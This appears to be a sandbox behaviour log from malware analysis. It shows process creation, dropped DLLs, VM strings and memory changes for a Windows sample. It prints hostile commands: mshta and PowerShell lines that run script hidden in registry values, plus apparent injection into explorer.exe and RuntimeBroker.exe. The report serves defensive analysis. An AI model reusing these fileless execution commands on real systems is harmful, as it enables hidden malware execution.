Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.386299480.000001E454AC0000.00000002.00000001.sdmp, csc.exe, 0000001F.00000002.393531014.00000252540B0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_0043AE32 push eax; iretd	0_3_0043AE33
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_0043AE34 push esi; iretd	0_3_0043AE35
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00431AD3 push ecx; ret	0_3_00431AE3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00431A80 push ecx; ret	0_3_00431A89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_0043AF92 push edx; iretd	0_3_0043AF93
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73752240 push ecx; ret	0_2_73752249
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73752293 push ecx; ret	0_2_737522A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0046B834 push cs; ret	0_2_0046B841
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0046BA9E push esp; ret	0_2_0046BAA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00466BB0 push ecx; ret	0_2_00466BB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00466F17 push ecx; ret	0_2_00466F27
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA4DCD push 3B000001h; retf	35_2_00FA4DD2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll			Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5040			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3816			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll			Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe TID: 6784	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior

Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000021.00000000.416282562.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000026.00000000.426595121.000001FC1125D000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.419810588.000000000F540000.00000004.00000001.sdmp	Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
Source: explorer.exe, 00000021.00000000.416803055.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000021.00000000.411212416.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_0043040A mov eax, dword ptr fs:[00000030h]		0_3_0043040A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_004300B7 mov esi, dword ptr fs:[00000030h]		0_3_004300B7

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 1060000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 736E1580	Jump to behavior
